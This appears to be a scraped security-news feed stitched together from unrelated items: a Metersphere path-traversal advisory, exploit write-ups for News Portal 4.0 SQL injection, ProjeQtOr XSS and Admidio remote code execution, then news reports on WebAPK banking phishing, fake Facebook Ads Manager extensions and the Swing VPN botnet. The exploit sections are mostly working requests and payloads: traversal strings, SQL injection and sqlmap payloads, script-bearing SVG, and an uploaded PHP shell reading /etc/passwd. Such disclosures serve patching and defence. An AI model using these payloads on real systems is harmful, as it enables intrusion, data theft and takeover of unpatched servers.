Metersphere is an opensource testing framework. Files uploaded to Metersphere may define a `belongType` value with a relative path like `../../../../` which may cause metersphere to attempt to overwrite an existing file in the defined location or to create a new file. Attackers would be limited to overwriting files that the metersphere process has access to. This issue has been addressed in version 2.10.3. Users are advised to upgrade. There are no known workarounds for this vulnerability.

**Summary**

metersphere 由于只检查了文件名，忘记检查文件类型，导致路径穿越。

**POC**

POC: https://1drv.ms/v/s!Avwg5C1eKVA4gl3LF2hgRyVNrSqk?e=DHbHKF

1、找到测试用例中的上传附件的按钮  
2、上传一个附件  
3、拦截请求，

POST /track/attachment/testcase/upload HTTP/1.1  
Host: 192.168.213.128:8081  
Content-Length: 381  
Accept-Language: zh-CN  
WORKSPACE: ed18cee8-2004-4bf1-b112-0070bc03b270  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36  
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAv1vklOIsjcjAyZ7  
Accept: application/json, text/plain, _/_  
CSRF-TOKEN: PpGjvIYb9h+d3ui4XudsF0lKJ9oUMhPVBGIkOzibaLIfhzPrKVb0YQLLHByaPGP8pZeHZ1VwtciGzO528axH8g==  
X-AUTH-TOKEN: a84e0cf1-05a7-4627-8129-0bc264dc694d  
PROJECT: a815f3f2-57be-47f4-8351-56a5c643c0de  
Origin: http://192.168.213.128:8081  
Referer: http://192.168.213.128:8081/  
Accept-Encoding: gzip, deflate  
Cookie: \_\_stripe\_mid=f2258077-6e3a-4225-8013-a67c38c075f2242a35; step\_dashboard=true; step\_client\_index=true; privacy-options=6/12/2023|technical|statistical|external  
Connection: close

\------WebKitFormBoundaryAv1vklOIsjcjAyZ7  
Content-Disposition: form-data; name="file"; filename="tmp2hyh.txt"  
Content-Type: text/plain

tmp2  
\------WebKitFormBoundaryAv1vklOIsjcjAyZ7  
Content-Disposition: form-data; name="request"; filename="blob"  
Content-Type: application/json

{"belongId":"","belongType":"../../../../../../"}  
\------WebKitFormBoundaryAv1vklOIsjcjAyZ7--

4、我们发现修改belongType为../../../../../../就可以达到路径穿越的目的

5 我们看了一下代码，如下，uploadAttachment 检查了BelongType是否等于ISSUE以及TEST\_CASE。如果都不是，就直接在函数saveAttachment中使用BelongType作为文件名的一部分，导致路径穿越。  

**Impact**

任意文件覆盖，甚至可以达到任意代码执行

CVE-2023-37461: metersphere 存在路径穿越漏洞

News Portal version 4.0 suffers from a remote SQL injection vulnerability.

# Exploit Title: News Portal v4.0 - SQL Injection (Unauthorized)# Date: 09/07/2023# Exploit Author: Hubert Wojciechowski# Contact Author: hub.woj12345@gmail.com# Vendor Homepage: https://phpgurukul.com/news-portal-project-in-php-and-mysql/c# Software Link: https://phpgurukul.com/?sdm_process_download=1&download_id=7643# Version: 4.0# We are looking for work security engineer, security administrator: https://www.pracuj.pl/praca/security-engineer-warszawa-plocka-9-11,oferta,1002635314# Testeted on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23## Example  1-----------------------------------------------------------------------------------------------------------------------Param: name, email, comment-----------------------------------------------------------------------------------------------------------------------Req-----------------------------------------------------------------------------------------------------------------------POST /newsportal/news-details.php?nid=13 HTTP/1.1Origin: http://127.0.0.1Sec-Fetch-User: ?1Host: 127.0.0.1:80Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7Accept-Encoding: gzip, deflateSec-Fetch-Site: same-originsec-ch-ua-mobile: ?0Content-Length: 277Sec-Fetch-Mode: navigateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36Connection: closeReferer: http://127.0.0.1/newsportal/news-details.php?nid=13Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7sec-ch-ua-platform: "Windows"Cache-Control: max-age=0Content-Type: application/x-www-form-urlencodedsec-ch-ua: "Chromium";v="113", "Not-A.Brand";v="24"Sec-Fetch-Dest: documentcsrftoken=400eb8ae07c6693e68d5f0f5b76920fff294c09d33e70526c7708609a51956dd&name=(SELECT%20(CASE%20WHEN%20(8137%3d6474)%20THEN%200x73647361646173646173%20ELSE%20(SELECT%206474%20UNION%20SELECT%201005)%20END))''&email=admin%40local.host&comment=ssssssssssssssssssssssssss&submit-----------------------------------------------------------------------------------------------------------------------Res:-----------------------------------------------------------------------------------------------------------------------HTTP/1.1 200 OKDate: Sun, 09 Jul 2023 10:55:26 GMTServer: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.1.17X-Powered-By: PHP/8.1.17Set-Cookie: PHPSESSID=l7dg3s1in50ojjigs4vm2p0r9s; path=/Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheConnection: closeContent-Type: text/html; charset=UTF-8Content-Length: 146161<script>alert('comment successfully submit. Comment will be display after admin review ');</script><!DOCTYPE html><html lang="en">  <head>    <meta charset="utf-8">    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">    <meta name="description" content="">    <meta name="author" content="">    <title>News Portal | Home Page  [...]-----------------------------------------------------------------------------------------------------------------------Req-----------------------------------------------------------------------------------------------------------------------POST /newsportal/news-details.php?nid=13 HTTP/1.1Origin: http://127.0.0.1Sec-Fetch-User: ?1Host: 127.0.0.1:80Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7Accept-Encoding: gzip, deflateSec-Fetch-Site: same-originsec-ch-ua-mobile: ?0Content-Length: 276Sec-Fetch-Mode: navigateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36Connection: closeReferer: http://127.0.0.1/newsportal/news-details.php?nid=13Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7sec-ch-ua-platform: "Windows"Cache-Control: max-age=0Content-Type: application/x-www-form-urlencodedsec-ch-ua: "Chromium";v="113", "Not-A.Brand";v="24"Sec-Fetch-Dest: documentcsrftoken=400eb8ae07c6693e68d5f0f5b76920fff294c09d33e70526c7708609a51956dd&name=(SELECT%20(CASE%20WHEN%20(8137%3d6474)%20THEN%200x73647361646173646173%20ELSE%20(SELECT%206474%20UNION%20SELECT%201005)%20END))'&email=admin%40local.host&comment=ssssssssssssssssssssssssss&submit-----------------------------------------------------------------------------------------------------------------------Res:-----------------------------------------------------------------------------------------------------------------------HTTP/1.1 200 OKDate: Sun, 09 Jul 2023 10:56:06 GMTServer: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.1.17X-Powered-By: PHP/8.1.17Set-Cookie: PHPSESSID=fcju4nb9mr2tu80mqv5cnduldk; path=/Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheContent-Length: 525Connection: closeContent-Type: text/html; charset=UTF-8<br /><b>Fatal error</b>:  Uncaught mysqli_sql_exception: You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'admin@local.host','ssssssssssssssssssssssssss','0')' at line 1 in C:\xampp3\htdocs\newsportal\news-details.php:21Stack trace:#0 C:\xampp3\htdocs\newsportal\news-details.php(21): mysqli_query(Object(mysqli), 'insert into tbl...')#1 {main}  thrown in <b>C:\xampp3\htdocs\newsportal\news-details.php</b> on line <b>21</b><br />w-----------------------------------------------------------------------------------------------------------------------SQLMap example param 'comment':-----------------------------------------------------------------------------------------------------------------------sqlmap identified the following injection point(s) with a total of 450 HTTP(s) requests:---Parameter: #2* ((custom) POST)    Type: boolean-based blind    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause    Payload: csrftoken=400eb8ae07c6693e68d5f0f5b76920fff294c09d33e70526c7708609a51956dd&name=sdsadasdas&email=admin@local.host&comment=ssssssssssssssssssssssssss' RLIKE (SELECT (CASE WHEN (3649=3649) THEN 0x7373737373737373737373737373737373737373737373737373 ELSE 0x28 END)) AND 'xRsB'='xRsB&submit=    Type: error-based    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)    Payload: csrftoken=400eb8ae07c6693e68d5f0f5b76920fff294c09d33e70526c7708609a51956dd&name=sdsadasdas&email=admin@local.host&comment=ssssssssssssssssssssssssss' OR (SELECT 6120 FROM(SELECT COUNT(*),CONCAT(0x71787a7671,(SELECT (ELT(6120=6120,1))),0x7170717071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'odEK'='odEK&submit=    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: csrftoken=400eb8ae07c6693e68d5f0f5b76920fff294c09d33e70526c7708609a51956dd&name=sdsadasdas&email=admin@local.host&comment=ssssssssssssssssssssssssss' AND (SELECT 1610 FROM (SELECT(SLEEP(5)))mZUx) AND 'bjco'='bjco&submit=---web application technology: PHP 8.1.17, Apache 2.4.56bacck-end DBMS: MySQL >= 5.0 (MariaDB fork)## Example 2 - login to administration panel-----------------------------------------------------------------------------------------------------------------------Param: username-----------------------------------------------------------------------------------------------------------------------Req-----------------------------------------------------------------------------------------------------------------------POST /newsportal/admin/ HTTP/1.1Host: 127.0.0.1Content-Length: 42Cache-Control: max-age=0sec-ch-ua: "Chromium";v="113", "Not-A.Brand";v="24"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1Origin: http://127.0.0.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: http://127.0.0.1/newsportal/admin/Accept-Encoding: gzip, deflateAccept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7Cookie: USERSUB_TYPE=0; IS_MODERATOR=0; REPLY_SORT_ORDER=ASC; SHOWTIMELOG=Yes; user_uniq_agent=95e1b7d0ab9086d6b88e9adfaacf07d887164827a5708adf; SES_ROLE=3; USER_UNIQ=117b06da2ff9aabad1a916992e92bb26; USERTYP=3; USERTZ=33; helpdesk_uniq_agent=%7B%22temp_name%22%3A%22test%22%2C%22email%22%3A%22test%40local.host%22%7D; CPUID=8dba9a451f44121c45180df414ab6917; DEFAULT_PAGE=dashboard; CURRENT_FILTER=cases; currency=USD; phpsessid-9795-sid=s7b0dqlpebu74ls14j61e5q3be; stElem___stickySidebarElement=%5Bid%3A0%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A1%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A2%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A3%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A4%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A5%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A6%5D%5Bvalue%3AnoClass%5D%23; WBCELastConnectJS=1688869781; PHPSESSID=2vag12caoqvv76avbeslm65je8Connection: closeusername=admin'&password=Test%40123&login=-----------------------------------------------------------------------------------------------------------------------Res:-----------------------------------------------------------------------------------------------------------------------HTTP/1.1 200 OKDate: Sun, 09 Jul 2023 11:00:53 GMTServer: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.1.17X-Powered-By: PHP/8.1.17Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheContent-Length: 505Connection: closeContent-Type: text/html; charset=UTF-8<br /><b>Fatal error</b>:  Uncaught mysqli_sql_exception: You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'f925916e2754e5e03f75dd58a5733251')' at line 1 in C:\xampp3\htdocs\newsportal\admin\index.php:13Stack trace:#0 C:\xampp3\htdocs\newsportal\admin\index.php(13): mysqli_query(Object(mysqli), 'SELECT AdminUse...')#1 {main}  thrown in <b>C:\xampp3\htdocs\newsportal\admin\index.php</b> on line <b>13</b><br />-----------------------------------------------------------------------------------------------------------------------Req-----------------------------------------------------------------------------------------------------------------------POST /newsportal/admin/ HTTP/1.1Host: 127.0.0.1Content-Length: 43Cache-Control: max-age=0sec-ch-ua: "Chromium";v="113", "Not-A.Brand";v="24"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1Origin: http://127.0.0.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: http://127.0.0.1/newsportal/admin/Accept-Encoding: gzip, deflateAccept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7Cookie: USERSUB_TYPE=0; IS_MODERATOR=0; REPLY_SORT_ORDER=ASC; SHOWTIMELOG=Yes; user_uniq_agent=95e1b7d0ab9086d6b88e9adfaacf07d887164827a5708adf; SES_ROLE=3; USER_UNIQ=117b06da2ff9aabad1a916992e92bb26; USERTYP=3; USERTZ=33; helpdesk_uniq_agent=%7B%22temp_name%22%3A%22test%22%2C%22email%22%3A%22test%40local.host%22%7D; CPUID=8dba9a451f44121c45180df414ab6917; DEFAULT_PAGE=dashboard; CURRENT_FILTER=cases; currency=USD; phpsessid-9795-sid=s7b0dqlpebu74ls14j61e5q3be; stElem___stickySidebarElement=%5Bid%3A0%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A1%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A2%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A3%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A4%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A5%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A6%5D%5Bvalue%3AnoClass%5D%23; WBCELastConnectJS=1688869781; PHPSESSID=2vag12caoqvv76avbeslm65je8Connection: closeusername=admin''&password=Test%40123&login=-----------------------------------------------------------------------------------------------------------------------Res:-----------------------------------------------------------------------------------------------------------------------HTTP/1.1 200 OKDate: Sun, 09 Jul 2023 11:02:15 GMTServer: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.1.17X-Powered-By: PHP/8.1.17Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheContent-Length: 4733Connection: closeContent-Type: text/html; charset=UTF-8<script>alert('Invalid Details');</script><!DOCTYPE html><html lang="en">    <head>        <meta charset="utf-8">        <meta name="viewport" content="width=device-width, initial-scale=1.0">        <meta name="description" content="News Portal.">        <meta name="author" content="PHPGurukul">                <title>News Portal | Admin Panel</title>[...]

News Portal 4.0 SQL Injection

ProjeQtOr Project Management System version 10.4.1 suffers from multiple cross site scripting vulnerabilities.

    Exploit Title: ProjeQtOr Project Management System V10.4.1 - Multiple XSSVersion: V10.4.1Bugs:  Multiple XSSTechnology: PHPVendor URL: https://www.projeqtor.orgSoftware Link: https://sourceforge.net/projects/projectorria/files/projeqtorV10.4.1.zip/downloadDate of found: 09.07.2023Author: Mirabbas AğalarovTested on: Linux 2. Technical Details & POC                                     ### XSS-1 ### visit: http://localhost/projeqtor/view/refreshCronIconStatus.php?cronStatus=miri%27);%22%3E%3Cscript%3Ealert(4)%3C/script%3E&csrfToken=payload: miri%27);%22%3E%3Cscript%3Ealert(4)%3C/script%3E                                    ### XSS-2 ###steps: 1. login to account2. go projects and create project3.add attachment3. upload svg file"""<?xml version="1.0" standalone="no"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>   <script type="text/javascript">      alert(document.location);   </script></svg>"""4. Go to  svg file ( http://localhost/projeqtor/files/attach/attachment_5/malas.svg )                                       ### XSS-3 ###Go to below adress (post request)POST /projeqtor/tool/ack.php?destinationWidth=50&destinationHeight=0&isIE=&xhrPostDestination=resultDivMain&xhrPostIsResultMessage=true&xhrPostValidationType=attachment&xhrPostTimestamp=1688898776311&csrfToken= HTTP/1.1Host: localhostContent-Length: 35sec-ch-ua: Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36sec-ch-ua-platform: ""Accept: */*Origin: http://localhostSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: http://localhost/projeqtor/view/main.phpAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=r5cjcsggl4j0oa9s70vchaklf3Connection: closeresultAck=<script>alert(4)</script>

ProjeQtOr Project Management System 10.4.1 Cross Site Scripting

Admidio version 4.2.10 suffers from a remote code execution vulnerability.

    Exploit Title: Admidio v4.2.10 - Remote Code Execution (RCE)Application: AdmidioVersion: 4.2.10Bugs:  RCETechnology: PHPVendor URL: https://www.admidio.org/Software Link: https://www.admidio.org/download.phpDate of found: 10.07.2023Author: Mirabbas AğalarovTested on: Linux2. Technical Details & POC========================================Steps:1. Login to account2. Go to Announcements3. Add Entry4. Upload .phar file in image upload section..phar file Content<?php echo system('cat /etc/passwd');?>5. Visit .phar file  ( http://localhost/admidio/adm_my_files/announcements/images/20230710-172217_430o3e5ma5dnuvhp.phar )Request:POST /admidio/adm_program/system/ckeditor_upload_handler.php?CKEditor=ann_description&CKEditorFuncNum=1&langCode=en HTTP/1.1Host: localhostContent-Length: 378Cache-Control: max-age=0sec-ch-ua: sec-ch-ua-mobile: ?0sec-ch-ua-platform: ""Upgrade-Insecure-Requests: 1Origin: http://localhostContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryne9TRuC1tAqhR86rUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: iframeReferer: http://localhost/admidio/adm_program/modules/announcements/announcements_new.php?headline=AnnouncementsAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: ADMIDIO_admidio_adm_cookieconsent_status=dismiss; ADMIDIO_admidio_adm_SESSION_ID=penqrouatvh0vmp8v2mdntrgdn; ckCsrfToken=o3th5RcghWxx2qar157Xx4Y1f7FQ42ayQ9TaV8MBConnection: close------WebKitFormBoundaryne9TRuC1tAqhR86rContent-Disposition: form-data; name="upload"; filename="shell.phar"Content-Type: application/octet-stream<?php echo system('cat /etc/passwd');?>------WebKitFormBoundaryne9TRuC1tAqhR86rContent-Disposition: form-data; name="ckCsrfToken"o3th5RcghWxx2qar157Xx4Y1f7FQ42ayQ9TaV8MB------WebKitFormBoundaryne9TRuC1tAqhR86r--

Admidio 4.2.10 Remote Code Execution

Threat actors are taking advantage of Android's WebAPK technology to trick unsuspecting users into installing malicious web apps on Android phones that are designed to capture sensitive personal information.
"The attack began with victims receiving SMS messages suggesting the need to update a mobile banking application," researchers from CSIRT KNF said in an analysis released last week. "The

Mobile Security / Malware

Threat actors are taking advantage of Android's WebAPK technology to trick unsuspecting users into installing malicious web apps on Android phones that are designed to capture sensitive personal information.

"The attack began with victims receiving SMS messages suggesting the need to update a mobile banking application," researchers from CSIRT KNF said in an analysis released last week. "The link contained in the message led to a site that used WebAPK technology to install a malicious application on the victim's device."

The application impersonates PKO Bank Polski, a multinational banking and financial services company headquartered in Warsaw. Details of the campaign were first shared by Polish cybersecurity firm RIFFSEC.

WebAPK allows users to install progressive web apps (PWAs) to their home screen on Android devices without having to use the Google Play Store.

"When a user installs a PWA from Google Chrome and a WebAPK is used, the minting server "mints" (packages) and signs an APK for the PWA," Google explains in its documentation.

"That process takes time, but when the APK is ready, the browser installs that app silently on the user's device. Because trusted providers (Play Services or Samsung) signed the APK, the phone installs it without disabling security, as with any app coming from the store. There is no need for sideloading the app."

Once installed, the fake banking app ("org.chromium.webapk.a798467883c056fed\_v2") urges users to enter their credentials and two-factor authentication (2FA) tokens, effectively resulting in their theft.

"One of the challenges in countering such attacks is the fact that WebAPK applications generate different package names and checksums on each device," CSIRT KNF said. "They are dynamically built by the Chrome engine, which makes the use of this data as Indicators of Compromise (IoC) difficult."

UPCOMING WEBINAR

Shield Against Insider Threats: Master SaaS Security Posture Management

Worried about insider threats? We've got you covered! Join this webinar to explore practical strategies and the secrets of proactive security with SaaS Security Posture Management.

Join Today

To counter such threats, it's recommended to block websites that use the WebAPK mechanism to carry out phishing attacks.

The development comes as Resecurity revealed that cybercriminals are increasingly leveraging specialized device spoofing tools for Android that are marketed on the dark web in a bid to impersonate compromised account holders and bypass anti-fraud controls.

The antidetect tools, including Enclave Service and MacFly, are capable of spoofing mobile device fingerprints and other software and network parameters that are analyzed by anti-fraud systems, with threat actors also leveraging weak fraud controls to conduct unauthorized transactions via smartphones using banking malware such as TimpDoor and Clientor.

"Cybercriminals use these tools to access compromised accounts and impersonate legitimate customers by exploiting stolen cookie files, impersonating hyper-granular device identifiers, and utilizing fraud victims' unique network settings," the cybersecurity company said.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Hackers Exploit WebAPK to Deceive Android Users into Installing Malicious Apps

By Deeba Ahmed
The attack's perpetrators are Vietnamese, as confirmed by Malwarebytes.
This is a post from HackRead.com Read the original post: Fake Ads Manager Software and Malicious Extensions Target Facebook Accounts

Currently, the campaign has affected approximately 800 individuals and businesses globally, including 310 in the United States, with an ad budget compromise of $180,000.

Facebook serves as a thriving platform for optimizing ad campaigns, making it a crucial tool for businesses worldwide to boost their revenues. However, it is not without its downsides, as the platform has been exploited by cybercriminals to spread malware and, **even worse, ransomware**.

A recent warning issued by Malwarebytes’ senior threat researcher, Jérôme Segura, highlights the need for businesses to be vigilant. He cautions against falling victim to malicious Meta ad manager downloaders and Chrome extensions, particularly when faced with offers that seem too good to be true and involve clicking on suspicious URLs. The primary targets of these attacks are often business account users who are willing to invest their ad dollars in Meta platforms.

**Vietnamese Hackers Targeting Businesses’ Advertising Accounts**

According to Malwarebyte’s latest blog post, a newly identified cybercrime gang originating from Vietnam has been engaging in targeted attacks on **Facebook business users**, with the aim of stealing advertising accounts. What makes this situation even more alarming is that victims are not limited to a specific geographic region; the attacks have been reported worldwide.

Jérôme Segura, in his **analysis**, reported a noticeable surge in sponsored posts and accounts that are attempting to impersonate Meta/Facebook Ad Manager in recent weeks. Delving deeper into the matter, investigators uncovered that the cybercriminals are distributing counterfeit software, falsely promoting it as a more effective tool for optimizing ads on Facebook. Businesses and advertisers need to be aware of this emerging threat to safeguard their accounts and assets.

The cybercrime gang employs malware-infected Chrome extensions as their method of choice to steal Facebook business account credentials. What is particularly intriguing is that Jérôme Segura was able to detect their campaign thanks to a mistake made by the threat actors themselves.

Apparently, the attackers accidentally placed one of the **malware files** in the wrong location, which ultimately led to the inadvertent exposure of stolen data. This fortunate error provided valuable insights to the researchers at Malwarebytes, aiding them in their investigation and analysis of the cybercrime operation.

**What Happens When Meta Business Accounts Get Infected with Malware?**

Once the malicious extension is downloaded, the attackers gain control over the business’s ad budget, allowing them to exploit it according to their own agenda. The campaign came to light in early June when the threat actors enticed businesses with deceptive Facebook Ads Manager program installers, distributed through URLs, promising to enhance ad revenues.

To make their scheme more convincing, the attackers utilized fraudulent accounts with thousands of followers. Consequently, the posts made through these accounts quickly went viral, further deceiving unsuspecting victims and expanding the impact of the attack.

The victims are redirected to phishing pages that imitate the appearance of Meta’s official logo and branding. Upon downloading the program file, several components of an MSI installer package are installed in the directory: C:\\Program Files (x86)\\Ads Manager\\Ads Manager. Subsequently, a batch script is initiated, opening a new browser window displaying a custom extension.

In this window, the unsuspecting victim is prompted to enter their Facebook credentials on a deceptive login page. It is through this fraudulent login page that the cybercriminals aim to harvest the victims’ login credentials, granting them unauthorized access to the victims’ Facebook business accounts.

The custom extension cleverly masquerades as an unpacked Google Translate extension, making it appear innocuous and legitimate. However, upon reverse engineering, it becomes evident that the extension’s code is entirely unrelated to its purported function. Instead, the sole purpose of this deceptive extension is to illicitly gather Facebook login credentials and cookies from unsuspecting users.

Image: Malwarebytes

To exfiltrate the stolen data, the cybercriminals employ a cunning technique of bypassing Content Security Policy (CSP) restrictions by leveraging **Google Analytics**. This allows them to transmit the stolen information undetected and without triggering any alarms. In effect, the attackers exploit the widely-used Google Analytics service as a conduit to sneak the stolen data out of the victim’s system and into their own malicious infrastructure.

This sophisticated method allows the cybercrime gang to continue their **illicit activities** discreetly, evading detection while compromising the security and privacy of Facebook business account users.

Just for your information, Facebook Ad Manager is a tool that enables users to run online ads on various social media platforms owned by Meta, including Instagram. Recently, cybersecurity researchers detected approximately 20 malicious ad manager archives, which were used to distribute Chrome extensions with the intention of hijacking Facebook business accounts.

During their investigation, researchers stumbled upon a newly discovered phishing site and found an unexpected mistake made by the cybercriminals. The attackers had failed to include the payload but inadvertently leaked the stolen data.

Recognizing their error, the criminals promptly removed the file from their **Google Drive account** and then updated the download link on the phishing site with a new file hosted on MediaFire. This move was likely an attempt to cover their tracks and maintain their malicious activities undetected.

Upon further analysis, researchers identified column titles in the Vietnamese language within the stolen data, which were directly related to ad budgets and currencies. This points to the origin of the cybercrime gang or indicates that they might be targeting victims from **Vietnamese-speaking regions**.

As of now, the campaign has victimized around 800 individuals and businesses, highlighting the severity of the threat and the importance of staying vigilant against such phishing attacks and malware distribution schemes. What’s worse, the threat actors managed to compromise over $180,000 in ad budget including from 300 victims within the United States.

Targeted regions – Image: Malwarebytes

In previous research, Meta disclosed that **threat actors like DuckTail**, among others, have been targeting Facebook advertising accounts over an extended period. While Jérôme Segura acknowledges the uncertainty regarding the direct attribution of this threat actor to DuckTail, he highlights the undeniable similarities in motives and a shared preference for hacking Facebook business accounts, which raises the possibility of a connection.

In response to the campaign’s discovery, Facebook has been duly notified, and the company has taken prompt action. To protect themselves, users of Facebook business manager accounts are advised to immediately revoke access for any unidentified users and conduct a thorough scan of their computers to identify and remove any potential malware that might have been installed. Taking these precautionary measures will help safeguard their accounts and data from falling victim to these malicious attacks.

1.  **Mandrake Android malware stealing Facebook data since 2016**
2.  **Facebook ads dropped malware posing as a Clubhouse PC app**
3.  **CopperStealer malware steals Facebook and Google passwords**
4.  **Facebook removes 100s of accounts for iOS and Android malware**

Fake Ads Manager Software and Malicious Extensions Target Facebook Accounts

By Waqas
The developer behind the malicious app, Limestone Software Solutions, has also been banned from the Google Play Store.
This is a post from HackRead.com Read the original post: Google Removes Swing VPN Android App Exposed as DDoS Botnet

The app under discussion, Swing VPN – Fast VPN Proxy, was uncovered as a DDoS botnet by a cybersecurity researcher named “Lecromee” on June 4th, 2023.

On June 4th, 2023, cybersecurity researcher “Lecromee” uncovered alarming information about the popular VPN app, Swing VPN – Fast VPN Proxy. Developed by Limestone Software Solutions for Android and iOS platforms, Swing VPN’s Android version was found to be operating as a dangerous **DDoS botnet**, posing significant risks to its unsuspecting users.

Hackread.com, first **reported on the issue** on June 21, 2023, after Lecromee’s investigation raised serious concerns. The findings indicated that the app, which claimed to offer legitimate VPN services, was harbouring malicious intent and could carry out distributed denial of service (DDoS) attacks.

Shortly after the report was published, Hackread.com was contacted by Google on June 22, confirming the veracity of the claims. In response to the alarming discovery, Google took immediate action and swiftly removed Swing VPN’s Android app with over 5 million installs from the **Google Play Store**.

It is worth noting that another app from Limestone Software Solutions, called **Hotspot for Swing VPN**, has also been removed from the app store along with Swing VPN – Fast VPN Proxy.

A Google spokesperson emphasized the company’s commitment to user safety and security, stating,

> “The app was removed from Google Play on June 22, and the developer has been banned. Users are also protected by Google Play Protect, which warns users of apps known to exhibit malicious behaviour on Android devices with Google Play Services, even when those apps come from other sources.”
> 
> Google

The removal of **Swing VPN – Fast VPN Proxy** app from the official app store highlights the ongoing challenges faced by platforms like Google Play in combating malicious apps. Unfortunately, such occurrences are not uncommon, and Google continuously works to enhance its security measures to protect users.

However, users themselves must remain vigilant and cautious about the apps they download and grant permission to. Cybersecurity experts recommend the following best practices to stay safe:

*   **Research Before Download**: Always research the app and its developer before downloading it. Check user reviews, ratings, and previous security incidents, if any.
*   **Update Regularly**: Keep all apps, including VPNs, up-to-date with the latest versions and security patches to minimize vulnerabilities.
*   **Verify Permissions**: Be cautious about granting excessive permissions to apps. Review and understand the permissions an app requests before installation.
*   **Use Reputable Sources**: Stick to trusted app stores like Google Play and Apple’s App Store to minimize the risk of downloading malicious apps.
*   **Antivirus Software**: Install reputable antivirus software on your device to detect and block potential threats.

